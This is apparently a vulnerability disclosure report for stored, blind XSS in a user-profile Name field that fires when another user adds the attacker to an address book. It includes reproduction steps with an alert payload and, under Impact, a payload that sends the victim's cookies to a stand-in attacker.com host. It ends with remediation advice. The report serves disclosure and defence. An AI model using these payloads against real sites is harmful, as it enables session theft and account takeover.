Summary
A stored and blind cross-site scripting (XSS) vulnerability exists in the Name field of the user profile. A malicious user can change their name to a JavaScript payload; the payload then executes in the browser of any other user who adds the malicious user to their Synchronization > Address books. The attacker never sees the execution themselves, which is why it is also classed as blind XSS.
Vulnerability Type
- Stored Cross-Site Scripting (XSS)
- Blind XSS
Steps to Reproduce (PoC)
- Log in as Admin
  - Navigate to System Settings > Users.
  - Add two users, user1 (User One) and user2 (User Two), using the +Add button.
- Inject XSS Payload
  - Log out from admin and log in as user1.
  - Go to My Account > Profile > Name.
  - Set First name: `<img src=1 onerror=alert(1)>`
  - Click Save.
- Trigger Blind XSS
  - Log out and log in as user2.
  - Navigate to My account > Synchronization > Address books > +Add.
  - Select user1 (shown as `<img src=1 onerror=alert(1)> One`).
  - Click Ok, then Save.
  - The stored XSS payload executes automatically in user2's browser; no further interaction from user2 is required.
Impact
- Unauthorized Fetch Requests
  Using `<img onerror>` or other techniques, an attacker can make the victim's browser send background requests to external domains or to internal endpoints reachable from the victim's network position.
- Data Theft / Session Hijacking / Account Manipulation
  With a more advanced payload, an attacker can exfiltrate session data or perform actions on behalf of the victim. If the session cookie is not marked HttpOnly, a payload such as
  `<img src=x onerror="new Image().src='http://attacker.com?c='+document.cookie">`
  sends the victim's cookies to the attacker and the session is compromised. Note that anti-CSRF protection does not mitigate this: script running in the application's origin can read the anti-CSRF token from the page and issue authenticated requests directly, so even with HttpOnly set the attacker can still act as the victim while the page is open.
Recommendation
Sanitize input on all fields, especially those rendered to other users, and HTML-encode every untrusted value at render time using encoding appropriate to the context it lands in (element text, attribute value, JavaScript string). The stored name must be treated as untrusted wherever it is displayed, including the address-book picker and any other view that shows another user's name, not only the profile page where it was entered. Marking the session cookie HttpOnly and deploying a Content-Security-Policy that blocks inline event handlers reduce the impact of a missed encoding but do not replace output encoding.